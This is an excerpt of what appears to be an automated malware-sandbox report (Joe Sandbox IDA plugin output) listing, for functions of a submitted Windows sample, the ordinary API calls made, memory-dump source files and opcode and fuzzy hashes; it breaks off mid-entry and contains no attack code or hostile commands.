                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$LabelVolume
                                                                                  • String ID: \VH
                                                                                  • API String ID: 2006950084-234962358
                                                                                  • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                  • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                  • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                  • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                  APIs
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                  • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                  • DrawMenuBar.USER32 ref: 00449761
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$InfoItem$Draw_malloc
                                                                                  • String ID: 0
                                                                                  • API String ID: 772068139-4108050209
                                                                                  • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                                  • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                  • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                                  • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$_wcscpy
                                                                                  • String ID: 3, 3, 8, 1
                                                                                  • API String ID: 3469035223-357260408
                                                                                  • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                  • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                  • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                  • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                  • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                  • API String ID: 2574300362-3530519716
                                                                                  • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                  • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                  • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                  • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                  • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: ICMP.DLL$IcmpCreateFile
                                                                                  • API String ID: 2574300362-275556492
                                                                                  • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                  • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                  • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                  • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                  • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: ICMP.DLL$IcmpSendEcho
                                                                                  • API String ID: 2574300362-58917771
                                                                                  • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                  • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                  • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                  • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                  • API String ID: 2574300362-4033151799
                                                                                  • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                  • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                  • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                  • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                  • API String ID: 2574300362-1816364905
                                                                                  • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                  • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                                                  • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                  • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                  • __itow.LIBCMT ref: 004699CD
                                                                                    • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                  • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                  • __itow.LIBCMT ref: 00469A97
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$__itow
                                                                                  • String ID:
                                                                                  • API String ID: 3379773720-0
                                                                                  • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                  • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                  • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                  • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                  • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                  • String ID:
                                                                                  • API String ID: 3880355969-0
                                                                                  • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                  • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                  • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                  • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2782032738-0
                                                                                  • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                  • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                  • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                  • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                  APIs
                                                                                  • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                  • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                  • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                  • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1352109105-0
                                                                                  • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                  • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                  • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                  • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                  APIs
                                                                                  • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                  • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                  • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 3321077145-0
                                                                                  • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                  • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                  • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                  • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                  APIs
                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                  • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                  • String ID:
                                                                                  • API String ID: 3058430110-0
                                                                                  • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                  • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                  • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                  • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 004503C8
                                                                                  • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                  • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                  • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Proc$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 2351499541-0
                                                                                  • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                  • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                  • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                  • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                  • TranslateMessage.USER32(?), ref: 00442B01
                                                                                  • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
